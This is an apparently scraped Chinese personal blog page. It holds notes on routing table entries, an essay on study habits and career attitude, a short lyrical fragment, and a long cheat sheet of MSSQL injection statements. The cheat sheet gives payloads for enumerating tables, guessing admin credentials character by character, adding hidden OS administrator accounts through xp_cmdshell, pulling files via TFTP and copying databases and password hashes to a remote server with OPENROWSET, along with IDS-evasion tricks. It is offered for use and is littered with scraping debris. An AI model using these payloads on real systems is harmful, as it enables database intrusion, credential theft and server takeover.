该路由记录的意思是：当我接收到一个数据包的目的网段不在我的路由记录中，我会将该数据包通过192.168.123.88这个接口发送到192.168.123.254这个地址，这个地址是下一个路由器的一个接口，这样这个数据包就可以交付给下一个路由器处理，与我无关。该路由记录的线路质量

第二条

缺省路由：

该路由记录的意思是：当我接收到一个数据包的目的网段不在我的路由记录中，我会将该数据包通过192.168.123.68这个接口发送到192.168.123.254这个地址，这个地址是下一个路由器的一个接口，这样这个数据包就可以交付给下一个路由器处理，与我无关。该路由记录的线路质量

第三条
本地环路：127.0.0.0这个网段内所有地址都指向自己机器，如果收到这样一个数据，应该发向哪里该路由记录的线路质量

第四条

直联网段的路由记录：当路由器收到发往直联网段的数据包时该如何处理，这种情况，路由记录的interface和gateway是同一个

当我接收到一个数据包的目的网段是192.168.123.0时，我会将该数据包通过192.168.123.68这个接口直接发送出去，因为这个端口直接连接着192.168.123.0这个网段，该路由记录的线路质量

第五条

直联网段的路由记录

当我接收到一个数据包的目的网段是192.168.123.0时，我会将该数据包通过192.168.123.88这个接口直接发送出去，因为这个端口直接连接着192.168.123.0这个网段，该路由记录的线路质量

第六条

本地主机路由：当路由器收到发送给自己的数据包时将如何处理

当我接收到一个数据包的目的网段是192.168.123.68时，我会将该数据包收下，因为这个数据包时发送给我自己的，该路由记录的线路质量

第七条

本地主机路由：当路由器收到发送给自己的数据包时将如何处理
当我接收到一个数据包的目的网段是192.168.123.88时，我会将该数据包收下，因为这个数据包时发送给我自己的，该路由记录的线路质量

第八条

本地广播路由：当路由器收到发送给直联网段的本地广播时如何处理
当我接收到广播数据包的目的网段是192.168.123.255时，我会将该数据从192.168.123.68接口以广播的形势发送出去，该路由记录的线路质量

第九条

本地广播路由：当路由器收到发送给直联网段的本地广播时如何处理
当我接收到广播数据包的目的网段是192.168.123.255时，我会将该数据从192.168.123.88接口以广播的形势发送出去，该路由记录的线路质量

第十条

组播路由：当路由器收到一个组播数据包时该如何处理
当我接收到组播数据包时，我会将该数据从192.168.123.68接口以组播的形势发送出去，该路由记录的线路质量

第十一条

组播路由：当路由器收到一个组播数据包时该如何处理 ! ], [- i& @( ]+ V1 |) [
当我接收到组播数据包时，我会将该数据从192.168.123.88接口以组播的形势发送出去，该路由记录的线路质量

第十二条

广播路由：当路由器收到一个绝对广播时该如何处理
当我接收到绝对广播数据包时，将该数据包丢弃掉

连接的缺省网关：192.168.123.254

学习的特点

飘零的紫 — Fri, 15 Aug 2008 07:32:53 +0800

学习的特点

从初中到高中到大学，一共学过多少知识，有多少实际用到过，咱们心里都有数吧。对于网络也一样，学了100个具体技术，常用的只有15个。其余的85个，过了3个月就忘了。这个就是学习的一个特点，不一定学完了就一定能用上，经常用的会记得很牢，不常用或者不用的，很快就会被忘记。因此，学习的目的是不是掌握所有知识，而是在遗忘某个知识的具体内容是，知道如何在最短时间内找到这个知识点在什么地方，并回忆起来。在网络中，也就是不需要你牢固的记住所有知识点，而是只要在网络出现问题时或一些其他环境中能以最快的速度，最高的效率来解决问题。这就要求咱们在深刻记忆常用网络技术后，对于各种各样的feature，只需要了解这个feature为什么会出现，它的出现能解决什么问题，大致上是如何解决的。这样当网络需要部署一个新的feature时，由于这个feature在你脑海中有印象，你就可以很快的找到相关资料，也就能很快的解决问题。

好记性不如烂笔头

俗话一直都是这么说的“好记性不如烂笔头”，不无道理啦。内存再大，重启就没啦，不如写到硬盘里牢靠。学习也是如此，现在blog这么流行，每搞定一个技术，把具体学习过程写到blog里，哪怕是纸制笔记本里，方便以后查阅就好。

总结至关重要
每学完一系列的知识点就做一次总结。在做总结的时候就会发现之前还会有或多或少的疑问。并且总结之前你学到的是很多点，通过总结你将看到的是一个面，将多个总结拼在一起，你将看到一个立方体，这时候，你就是个顾问型的专家啦。

反复思考
对于一个知识点，经常是第一次看会是一个理解，过一阵再看又会是另一个理解。对于这样的情况，不要郁闷，这是好事，对于同一个知识，多次学习，多次思考，更有助于理解。

没有无用功
世上没有任何事情是白做的。哪怕你对一个知识点花了一个下午的时间去学习，结果还是完全理解错了，但你在这个过程之中通过查阅各种文档，对这个知识点有个更深刻的理解，只要最终找到正解，你绝对比一次看懂的人领悟的深刻。这也就是为什么有人会说7次过ccie的人比1次过的水平高的多的多。

生活常事搞定深奥原理
一张嘴就是满嘴的术语，这种人对知识的理解是很差的，只会用术语来伪装自己。如果你能用幼儿园阿姨发苹果把负载均衡原理说清，这才是真正的领悟。在使用生活常事来阐述深奥原理时，首先你一定对深奥原理有深刻的理解，才能借鉴生活常事来阐述他。去尝试着做吧，这是个不小的挑战。

多给别人讲讲课
讲课永远都是一种学习的好方法。只有真正明白了一个道理，才能讲述给别人听。当然还是要用生活常事讲明白深奥原理。并且就像一个人的身体，一个多星期一直便秘，自然吃不进去东西，这和学习是一个道理。在一段时间后很容易出现学不进去的情况，这时应适当考虑给别人讲讲课，把所学的东西吐出去，共享给别人，自己才会更有动力学更多的东西。

共享精神
现在在国内学习的第一大问题：初学者不会提问。第二大问题就是高手不愿意回答。很多高手都自恃清高，把这自己那点知识生怕别人学到。这样对别人不好对自己更不好。留着那点知识有什么用，生怕别人超过自己么。只要自己知道的，应该尽量的share出来，大家一起进步，自己才能更好的进步。share才能有一个更好的学习氛围。

学习方法的通用性
所有学科的学习都是共通的，只要掌握了方法和窍门，就可以很快的完成学习。一个得道的ccie可能之花2年时间就考完注册会计师，一个得到的注册会计师也很可能只用1年多的时间就考完ccie，原理很简单，他们并不局限于某个学科，他们所掌握的并不是某个知识，他们所掌握的是学习方法这项技能，比所有知识都难得的东西。

网络学习的高级阶段
学到一定程度时就完全没必要把每个技术都看的很细了。只需要做到如下几点：

为什么会出现某种技术
这项技术可以解决什么问题
这项技术如何解决的问题（基本原理）
可以了解一下配置过程，因为有助于理解原理
把以上几点记在本上或者blog上，再往深了就没必要看了。

心态

付出必有回报

不要认为做有些事情是浪费时间，不要认为有些事情不值得做。就像蛋蛋弄的blog，看似很浪费时间，但最后通过这个blog认识了很多朋友，都对我有莫大的帮助。再如，蛋蛋花了很多时间去研究系统，做为一个网络工程师，学系统其实看似挺不着调，但真正在网络应用中，很多东西都要靠系统方面的知识去完成。不要再认为很多事情不值得去做啦，尽管去做吧，总有一天老天爷会给你回报的。

不要急于求成重在积累
急于求成，这是一个心魔，很多大学毕业生都有这个心里障碍，看着别人挣得多，水平高，天天想热锅上的蚂蚁一样。带着这样的心态去工作去学习，总是草草了事，认为这个学会了，那个学会了，立刻看另一个知识点，最后导致很多东西都是一知半解。不如踏实下来，慢慢把所有东西看透，这才是事半功倍的做事方法。

求安逸不等于不求上进
求安逸不等于不求上进。在很多公司，员工并不是很忙，但大多数人选择了用闲暇的时间聊天、吃东西、上网、打尤其，这个是彻彻底底的不求上进。但如果利用这些时间看看书，学学知识，看似是求安逸，但时时刻刻你都在进步，总有一天你会一鸣惊人。

不要把钱看的太重
钱这个东西固然好，但看你如何去追求。以前蛋蛋总是羡慕外企的员工，一个月拿着3、4万的工资，多爽。可现在看来，他们有的人一年有300多天在出差，天天奔命，拿着几万块钱，你问问他们有没有时间去花。而且人总有老的一天，现在拿着3、4万的月薪，一旦到了老了那天，要回到3、4千的生活水平，可能很难再回来了。人活着应该以快乐为主，不要把自己卖给公司，做些自己想做的事情，做些有意义的事情，等到了80岁回头看看，这一辈子没白活。如果到了80岁，看看自己身上盖满了cisco、juniper、华为的印章，恩，不错，没白为cisco、juniper、华为活。一个月3、4千的工资一样可以活得很好。一个捡破烂的，每天多捡20个瓶子，会高兴的发疯，而一个月薪3、4万的人，多给他们加一万，应该没什么太多感觉。

明事理的领导骂人不会没有道理的
员工总爱抱怨领导今天又臭骂了我一顿，总觉得领导针对自己。但事实上很多时候，员工个人看到的只是自己一个点，而领导看到的是公司一个面，他会照顾到整体的利益。虚心接受吧，领导总会有他的道理的。

把困难当成享受

遇到困难，不要总是郁闷。现在的天气虽然炎热，你可以想想冬天，0度的气温，突然能升到36度该多好，能这样想想心里可能就会感觉凉爽不少。同样，遇到一个很难做的项目，不必考虑那么多，就当是一次考验，反正总要面对，痛苦的面对，不如去好好享受它。

再烂的人也有值得学习的地方
俗话说“三人行必有我师“，但在我看来，应该是”三人行，有我三师“。每个人都有其优点，认真的去发现吧，把别人的优点变为自己的优点，不要一味的认为某人毛病多，看的更广些，会发现他的优点的。

如何调整心态
找个时间，融入到自然中去，看看那些爬山的老人。或者晚上躺在床上，想想还有比自己可怜的人还有很多。你会发现自己生活的很幸福，何必去比这比那呢。跟自己比就好啦。

平和不张扬
现在是个张扬个性的时代，但张扬不会对你有太多好处，现在的社会中，夹缝中求生存永远的最好的生存方式。不与别人冲突，找到适合自己生存发展的空间，你会感觉工作很轻松。

MSSQL注射语句

飘零的紫 — Sun, 10 Aug 2008 14:03:47 +0800

1.判断有无注入点
; and 1=1 and 1=2

2.猜表一般的表的名称无非是admin adminuser user pass password 等..
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) ---判断是否存在admin这张表

3.猜帐号数目如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)

4.猜解字段名称在len( ) 括号里面加上我们想到的字段名称.
and 1=(select count(*) from admin where len(*)>0)--
and 1=(select count(*) from admin where len(用户字段名称name)>0)
and 1=(select count(*) from admin where len(_blank>密码字段名称password)>0)

5.猜解各个字段的长度猜解长度就是把>0变换直到返回正确页面为止
and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6) 错误
and 1=(select count(*) from admin where len(name)>5) 正确长度是6
and 1=(select count(*) from admin where len(name)=6) 正确

and 1=(select count(*) from admin where len(password)>11) 正确
and 1=(select count(*) from admin where len(password)>12) 错误长度是12
and 1=(select count(*) from admin where len(password)=12) 正确

6.猜解字符
and 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位
and 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位
就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
这个查询语句可以猜解中文的用户和_blank>密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.

group by users.id having 1=1--
group by users.id, users.username, users.password, users.privs having 1=1--
; insert into users values( 666, attacker, foobar, 0xffff )--

UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS

WHERE TABLE_blank>_NAME=logintable-
UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS

WHERE TABLE_blank>_NAME=logintable WHERE COLUMN_blank>_NAME NOT IN (login_blank

>_id)-
UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS

WHERE TABLE_blank>_NAME=logintable WHERE COLUMN_blank>_NAME NOT IN (login_blank

>_id,login_blank>_name)-
UNION SELECT TOP 1 login_blank>_name FROM logintable-
UNION SELECT TOP 1 password FROM logintable where login_blank>_name=Rahul--

看_blank>服务器打的补丁=出错了打了SP4补丁
and 1=(select @@VERSION)--

看_blank>数据库连接账号的权限，返回正常，证明是_blank>服务器角色sysadmin权限。
and 1=(SELECT IS_blank>_SRVROLEMEMBER(sysadmin))--

判断连接_blank>数据库帐号。（采用SA账号连接返回正常=证明了连接账号是SA）
and sa=(SELECT System_blank>_user)--
and user_blank>_name()=dbo--
and 0<>(select user_blank>_name()--

看xp_blank>_cmdshell是否删除
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_

blank>_cmdshell)--

xp_blank>_cmdshell被删除，恢复,支持绝对路径的恢复
;EXEC master.dbo.sp_blank>_addextendedproc xp_blank>_cmdshell,xplog70.dll--
;EXEC master.dbo.sp_blank>_addextendedproc xp_blank>_cmdshell,c:\inetpub\wwwroot\

xplog70.dll--

反向PING自己实验
;use master;declare @s int;exec sp_blank>_oacreate "wscript.shell",@s out;exec sp_blank>

_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--

加帐号
;DECLARE @shell INT EXEC SP_blank>_OACREATE wscript.shell,@shell OUTPUT EXEC SP_blank>

_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$Content$nbsp;1866574 /add--

创建一个虚拟目录E盘：
;declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o,

run, NULL, cscript.exe c：\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e：\"--

访问属性：（配合写入一个webshell）
declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o,

run, NULL, cscript.exe c：\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse

爆库特殊_blank>技巧：:%5c=\ 或者把/和\ 修改%5提交
and 0<>(select top 1 paths from newtable)--

得到库名（从1到5都是系统的id，6以上才可以判断）
and 1=(select name from master.dbo.sysdatabases where dbid=7)--
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
依次提交 dbid = 7,8,9.... 得到更多的_blank>数据库名

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) 暴到一个表假设为 admin
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in (Admin))

来得到其他的表。
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin
and uid>(str(id))) 暴到UID的数值假设为18779569 uid=id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一个admin的一个

字段,假设为 user_blank>_id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in
(id,...)) 来暴出其他的字段
and 0<(select user_blank>_id from BBS.dbo.admin where username>1) 可以得到用户名
依次可以得到_blank>密码。。。。。假设存在user_blank>_id username ,password 等字段

and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) 得到表名
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in(Address))
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin and uid>(s

tr(id))) 判断id值
and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段

?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union，access也好用)

得到WEB路径
;create table [dbo].[swap] ([swappass][char](255));--
and (select top 1 swappass from swap)=1--
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_blank>_regread @rootkey=HKEY_blank>_LOCAL_blank>_MACHINE,

@key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\, @value_blank

>_name=/, values=@test OUTPUT insert into paths(path) values(@test)--
;use ku1;--
;create table cmd (str image);-- 建立image类型的表cmd

存在xp_blank>_cmdshell的测试过程：
;exec master..xp_blank>_cmdshell dir
;exec master.dbo.sp_blank>_addlogin jiaoniang$;-- 加SQL帐号
;exec master.dbo.sp_blank>_password null,jiaoniang$,1866574;--
;exec master.dbo.sp_blank>_addsrvrolemember jiaoniang$Content$nbsp;sysadmin;--
;exec master.dbo.xp_blank>_cmdshell net user jiaoniang$Content$nbsp;1866574 /workstations:* /

times:all /passwordchg:yes /passwordreq:yes /active:yes /add;--
;exec master.dbo.xp_blank>_cmdshell net localgroup administrators jiaoniang$Content$nbsp;/add;--
exec master..xp_blank>_servicecontrol start, schedule 启动_blank>服务
exec master..xp_blank>_servicecontrol start, server
; DECLARE @shell INT EXEC SP_blank>_OACREATE wscript.shell,@shell OUTPUT EXEC SP

_blank>_OAMETHOD @shell,run,null, C：\WINNT\system32\cmd.exe /c net user jiaonian

g$Content$nbsp;1866574 /add
;DECLARE @shell INT EXEC SP_blank>_OACREATE wscript.shell,@shell OUTPUT EXEC S

P_blank>_OAMETHOD @shell,run,null, C：\WINNT\system32\cmd.exe /c net localgroup

administrators jiaoniang$Content$nbsp;/add
; exec master..xp_blank>_cmdshell tftp -i youip get file.exe-- 利用TFTP上传文件

;declare @a sysname set @a=xp_blank>_+cmdshell exec @a dir c:\
;declare @a sysname set @a=xp+_blank>_cm’+’dshell exec @a dir c:\
;declare @a;set @a=db_blank>_name();backup database @a to disk=你的IP你的共享目录

bak.dat 如果被限制则可以。
select * from openrowset(_blank>sqloledb,server;sa;,select OK! exec master.dbo.sp_

blank>_addlogin hax)

查询构造：
SELECT * FROM news WHERE id=... AND topic=... AND .....
adminand 1=(select count(*) from [user] where username=victim and right(left(userp

ass,01),1)=1) and userpass <>
select 123;--
;use master;--
:a or name like fff%;-- 显示有一个叫ffff的用户哈。
and 1<>(select count(email) from [user]);--
;update [users] set email=(select top 1 name from sysobjects where xtype=u and

status>0) where name=ffff;--
;update [users] set email=(select top 1 id from sysobjects where xtype=u and nam

e=ad) where name=ffff;--
;update [users] set email=(select top 1 name from sysobjects where xtype=u and i

d>581577110) where name=ffff;--
;update [users] set email=(select top 1 count(id) from password) where name=ffff;--
;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;--
;update [users] set email=(select top 1 name from password where id=2) where name=ffff;--
上面的语句是得到_blank>数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。
通过查看ffff的用户资料可得第一个用表叫ad
然后根据表名ad得到这个表的ID 得到第二个表的名字

insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x

73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--
insert into users values( 667,123,123,0xffff)--
insert into users values ( 123, admin--, password, 0xffff)--
;and user>0
;and (select count(*) from sysobjects)>0
;and (select count(*) from mysysobjects)>0 //为access_blank>数据库

枚举出数据表名
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);--
这是将第一个表名更新到aaa的字段处。
读出第一个表，第二个表可以这样读出来（在条件后加上 and name<>刚才得到的表名）。
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0

and name<>vote);--
然后id=1552 and exists(select * from aaa where aaa>5)
读出第二个表，一个个的读出，直到没有为止。
读字段是这样：
;update aaa set aaa=(select top 1 col_blank>_name(object_blank>_id(表名),1));--
然后id=152 and exists(select * from aaa where aaa>5)出错，得到字段名
;update aaa set aaa=(select top 1 col_blank>_name(object_blank>_id(表名),2));--
然后id=152 and exists(select * from aaa where aaa>5)出错，得到字段名

[获得数据表名][将字段值更新为表名，再想法读出这个字段的值就可得到表名]
update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0

[ and name<>你得到的表名查出一个加一个]) [ where 条件] select top 1 name from sysobje

cts where xtype=u and status>0 and name not in(table1,table2,…)
通过SQLSERVER注入_blank>漏洞建_blank>数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]

[获得数据表字段名][将字段值更新为字段名，再想法读出这个字段的值就可得到字段名]
update 表名 set 字段=(select top 1 col_blank>_name(object_blank>_id(要查询的数据表名),

字段列如:1) [ where 条件]

绕过IDS的检测[使用变量]
;declare @a sysname set @a=xp_blank>_+cmdshell exec @a dir c:\
;declare @a sysname set @a=xp+_blank>_cm’+’dshell exec @a dir c:\

1、开启远程_blank>数据库
基本语法
select * from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select *

from table1 )
参数: (1) OLEDB Provider name
2、其中连接字符串参数可以是任何端口用来连接,比如
select * from OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address

=192.168.0.1,1433;, select * from table
3.复制目标主机的整个_blank>数据库insert所有远程表到本地表。

基本语法：
insert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select *

from table1) select * from table2
这行语句将目标主机上table2表中的所有数据复制到远程_blank>数据库中的table1表中。实际运用

中适当修改连接字符串的IP地址和端口，指向需要的地方，比如：
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address

=192.168.0.1,1433;,select * from table1) select * from table2
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address

=192.168.0.1,1433;,select * from _blank>_sysdatabases)
select * from master.dbo.sysdatabases
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address

=192.168.0.1,1433;,select * from _blank>_sysobjects)
select * from user_blank>_database.dbo.sysobjects
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address

=192.168.0.1,1433;,select * from _blank>_syscolumns)
select * from user_blank>_database.dbo.syscolumns
复制_blank>数据库：
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address

=192.168.0.1,1433;,select * from table1) select * from database..table1
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Addres

s=192.168.0.1,1433;,select * from table2) select * from database..table2

复制哈西表（HASH）登录_blank>密码的hash存储于sysxlogins中。方法如下：
insert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,s

elect * from _blank>_sysxlogins) select * from database.dbo.sysxlogins
得到hash之后，就可以进行暴力破解。

遍历目录的方法：先创建一个临时表：temp
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3

nvarchar(255));--
;insert temp exec master.dbo.xp_blank>_availablemedia;-- 获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_blank>_subdirs c:\;-- 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_blank>_dirtree c:\;-- 获得所有子目录

的目录树结构,并寸入temp表中
;insert into temp(id) exec master.dbo.xp_blank>_cmdshell type c:\web\index.asp;-

- 查看某个文件的内容
;insert into temp(id) exec master.dbo.xp_blank>_cmdshell dir c:\;--
;insert into temp(id) exec master.dbo.xp_blank>_cmdshell dir c:\ *.asp /s/a;--
;insert into temp(id) exec master.dbo.xp_blank>_cmdshell cscript C:\Inetpub\Admin

Scripts\adsutil.vbs enum w3svc
;insert into temp(id,num1) exec master.dbo.xp_blank>_dirtree c:\;-- （xp_blank>_

dirtree适用权限PUBLIC）
写入表：
语句1：and 1=(SELECT IS_blank>_SRVROLEMEMBER(sysadmin));--
语句2：and 1=(SELECT IS_blank>_SRVROLEMEMBER(serveradmin));--
语句3：and 1=(SELECT IS_blank>_SRVROLEMEMBER(setupadmin));--
语句4：and 1=(SELECT IS_blank>_SRVROLEMEMBER(securityadmin));--
语句5：and 1=(SELECT IS_blank>_SRVROLEMEMBER(securityadmin));--
语句6：and 1=(SELECT IS_blank>_SRVROLEMEMBER(diskadmin));--
语句7：and 1=(SELECT IS_blank>_SRVROLEMEMBER(bulkadmin));--
语句8：and 1=(SELECT IS_blank>_SRVROLEMEMBER(bulkadmin));--
语句9：and 1=(SELECT IS_blank>_MEMBER(db_blank>_owner));--

把路径写到表中去：
;create table dirs(paths varchar(100), id int)--
;insert dirs exec master.dbo.xp_blank>_dirtree c:\--
and 0<>(select top 1 paths from dirs)--
and 0<>(select top 1 paths from dirs where paths not in(@Inetpub))--
;create table dirs1(paths varchar(100), id int)--
;insert dirs exec master.dbo.xp_blank>_dirtree e:\web--
and 0<>(select top 1 paths from dirs1)--

把_blank>数据库备份到网页目录：下载
;declare @a sysname; set @a=db_blank>_name();backup database @a to disk

=e:\web\down.bak;--

and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where

xtype=char(85)) T order by id desc)
and 1=(Select Top 1 col_blank>_name(object_blank>_id(USER_blank>_LOGIN)

,1) from sysobjects) 参看相关表。
and 1=(select user_blank>_id from USER_blank>_LOGIN)
and 0=(select user from USER_blank>_LOGIN where user>1)

-=- wscript.shell example -=-
declare @o int
exec sp_blank>_oacreate wscript.shell, @o out
exec sp_blank>_oamethod @o, run, NULL, notepad.exe
; declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>

_oamethod @o, run, NULL, notepad.exe--

declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_blank>_oacreate scripting.filesystemobject, @o out
exec sp_blank>_oamethod @o, opentextfile, @f out, c:\boot.ini, 1
exec @ret = sp_blank>_oamethod @f, readline, @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_blank>_oamethod @f, readline, @line out
end

declare @o int, @f int, @t int, @ret int
exec sp_blank>_oacreate scripting.filesystemobject, @o out
exec sp_blank>_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1
exec @ret = sp_blank>_oamethod @f, writeline, NULL,

declare @o int, @ret int
exec sp_blank>_oacreate speech.voicetext, @o out
exec sp_blank>_oamethod @o, register, NULL, foo, bar
exec sp_blank>_oasetproperty @o, speed, 150
exec sp_blank>_oamethod @o, speak, NULL, all your sequel servers are belong

to,us, 528
waitfor delay 00:00:05

; declare @o int, @ret int exec sp_blank>_oacreate speech.voicetext, @o out

exec sp_blank>_oamethod @o, register, NULL, foo, bar exec sp_blank>_oasetp

roperty @o, speed, 150 exec sp_blank>_oamethod @o, speak, NULL, all your

sequel servers are belong to us, 528 waitfor delay 00:00:05--

xp_blank>_dirtree适用权限PUBLIC
exec master.dbo.xp_blank>_dirtree c:\
返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型，depth字段是整形字段。
create table dirs(paths varchar(100), id int)
建表，这里建的表是和上面xp_blank>_dirtree相关连，字段相等、类型相同。
insert dirs exec master.dbo.xp_blank>_dirtree c:\
只要我们建表与存储进程返回的字段相定义相等就能够执行！达到写表的效果,一步步达到我们想要的信息！

人生路上难免聚与散

飘零的紫 — Wed, 2 Jul 2008 11:38:11 +0800

人生路上难免聚与散

聚的喜悦

与散的离合``````````````